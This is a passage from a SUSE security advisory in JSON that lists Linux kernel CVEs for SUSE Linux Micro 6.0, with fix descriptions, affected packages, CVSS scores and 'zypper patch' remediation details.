"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68725",
"url": "https://www.suse.com/security/cve/CVE-2025-68725"
},
{
"category": "external",
"summary": "SUSE Bug 1255569 for CVE-2025-68725",
"url": "https://bugzilla.suse.com/1255569"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68725"
},
{
"cve": "CVE-2025-68727",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68727"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs3: Fix uninit buffer allocated by __getname()\n\nFix uninit errors caused after buffer allocation given to \u0027de\u0027; by\ninitializing the buffer with zeroes. The fix was found by using KMSAN.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68727",
"url": "https://www.suse.com/security/cve/CVE-2025-68727"
},
{
"category": "external",
"summary": "SUSE Bug 1255568 for CVE-2025-68727",
"url": "https://bugzilla.suse.com/1255568"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68727"
},
{
"cve": "CVE-2025-68728",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68728"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs3: fix uninit memory after failed mi_read in mi_format_new\n\nFix a KMSAN un-init bug found by syzkaller.\n\nntfs_get_bh() expects a buffer from sb_getblk(), that buffer may not be\nuptodate. We do not bring the buffer uptodate before setting it as\nuptodate. If the buffer were to not be uptodate, it could mean adding a\nbuffer with un-init data to the mi record. Attempting to load that record\nwill trigger KMSAN.\n\nAvoid this by setting the buffer as uptodate, if it\u0027s not already, by\noverwriting it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68728",
"url": "https://www.suse.com/security/cve/CVE-2025-68728"
},
{
"category": "external",
"summary": "SUSE Bug 1255539 for CVE-2025-68728",
"url": "https://bugzilla.suse.com/1255539"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68728"
},
{
"cve": "CVE-2025-68732",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68732"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpu: host1x: Fix race in syncpt alloc/free\n\nFix race condition between host1x_syncpt_alloc()\nand host1x_syncpt_put() by using kref_put_mutex()\ninstead of kref_put() + manual mutex locking.\n\nThis ensures no thread can acquire the\nsyncpt_mutex after the refcount drops to zero\nbut before syncpt_release acquires it.\nThis prevents races where syncpoints could\nbe allocated while still being cleaned up\nfrom a previous release.\n\nRemove explicit mutex locking in syncpt_release\nas kref_put_mutex() handles this atomically.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68732",
"url": "https://www.suse.com/security/cve/CVE-2025-68732"
},
{
"category": "external",
"summary": "SUSE Bug 1255688 for CVE-2025-68732",
"url": "https://bugzilla.suse.com/1255688"
},
{
"category": "external",
"summary": "SUSE Bug 1255689 for CVE-2025-68732",
"url": "https://bugzilla.suse.com/1255689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-68732"
},
{
"cve": "CVE-2025-68733",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68733"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmack: fix bug: unprivileged task can create labels\n\nIf an unprivileged task is allowed to relabel itself\n(/smack/relabel-self is not empty),\nit can freely create new labels by writing their\nnames into own /proc/PID/attr/smack/current\n\nThis occurs because do_setattr() imports\nthe provided label in advance,\nbefore checking \"relabel-self\" list.\n\nThis change ensures that the \"relabel-self\" list\nis checked before importing the label.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68733",
"url": "https://www.suse.com/security/cve/CVE-2025-68733"
},
{
"category": "external",
"summary": "SUSE Bug 1255615 for CVE-2025-68733",
"url": "https://bugzilla.suse.com/1255615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68733"
},
{
"cve": "CVE-2025-68734",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68734"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nisdn: mISDN: hfcsusb: fix memory leak in hfcsusb_probe()\n\nIn hfcsusb_probe(), the memory allocated for ctrl_urb gets leaked when\nsetup_instance() fails with an error code. Fix that by freeing the urb\nbefore freeing the hw structure. Also change the error paths to use the\ngoto ladder style.\n\nCompile tested only. Issue found using a prototype static analysis tool.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68734",
"url": "https://www.suse.com/security/cve/CVE-2025-68734"
},
{
"category": "external",
"summary": "SUSE Bug 1255538 for CVE-2025-68734",
"url": "https://bugzilla.suse.com/1255538"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68734"
},
{
"cve": "CVE-2025-68740",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68740"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nima: Handle error code returned by ima_filter_rule_match()\n\nIn ima_match_rules(), if ima_filter_rule_match() returns -ENOENT due to\nthe rule being NULL, the function incorrectly skips the \u0027if (!rc)\u0027 check\nand sets \u0027result = true\u0027. The LSM rule is considered a match, causing\nextra files to be measured by IMA.\n\nThis issue can be reproduced in the following scenario:\nAfter unloading the SELinux policy module via \u0027semodule -d\u0027, if an IMA\nmeasurement is triggered before ima_lsm_rules is updated,\nin ima_match_rules(), the first call to ima_filter_rule_match() returns\n-ESTALE. This causes the code to enter the \u0027if (rc == -ESTALE \u0026\u0026\n!rule_reinitialized)\u0027 block, perform ima_lsm_copy_rule() and retry. In\nima_lsm_copy_rule(), since the SELinux module has been removed, the rule\nbecomes NULL, and the second call to ima_filter_rule_match() returns\n-ENOENT. This bypasses the \u0027if (!rc)\u0027 check and results in a false match.\n\nCall trace:\n selinux_audit_rule_match+0x310/0x3b8\n security_audit_rule_match+0x60/0xa0\n ima_match_rules+0x2e4/0x4a0\n ima_match_policy+0x9c/0x1e8\n ima_get_action+0x48/0x60\n process_measurement+0xf8/0xa98\n ima_bprm_check+0x98/0xd8\n security_bprm_check+0x5c/0x78\n search_binary_handler+0x6c/0x318\n exec_binprm+0x58/0x1b8\n bprm_execve+0xb8/0x130\n do_execveat_common.isra.0+0x1a8/0x258\n __arm64_sys_execve+0x48/0x68\n invoke_syscall+0x50/0x128\n el0_svc_common.constprop.0+0xc8/0xf0\n do_el0_svc+0x24/0x38\n el0_svc+0x44/0x200\n el0t_64_sync_handler+0x100/0x130\n el0t_64_sync+0x3c8/0x3d0\n\nFix this by changing \u0027if (!rc)\u0027 to \u0027if (rc \u003c= 0)\u0027 to ensure that error\ncodes like -ENOENT do not bypass the check and accidentally result in a\nsuccessful match.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68740",
"url": "https://www.suse.com/security/cve/CVE-2025-68740"
},
{
"category": "external",
"summary": "SUSE Bug 1255812 for CVE-2025-68740",
"url": "https://bugzilla.suse.com/1255812"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68740"
},
{
"cve": "CVE-2025-68742",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68742"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix invalid prog-\u003estats access when update_effective_progs fails\n\nSyzkaller triggers an invalid memory access issue following fault\ninjection in update_effective_progs. The issue can be described as\nfollows:\n\n__cgroup_bpf_detach\n update_effective_progs\n compute_effective_progs\n bpf_prog_array_alloc \u003c-- fault inject\n purge_effective_progs\n /* change to dummy_bpf_prog */\n array-\u003eitems[index] = \u0026dummy_bpf_prog.prog\n\n---softirq start---\n__do_softirq\n ...\n __cgroup_bpf_run_filter_skb\n __bpf_prog_run_save_cb\n bpf_prog_run\n stats = this_cpu_ptr(prog-\u003estats)\n /* invalid memory access */\n flags = u64_stats_update_begin_irqsave(\u0026stats-\u003esyncp)\n---softirq end---\n\n static_branch_dec(\u0026cgroup_bpf_enabled_key[atype])\n\nThe reason is that fault injection caused 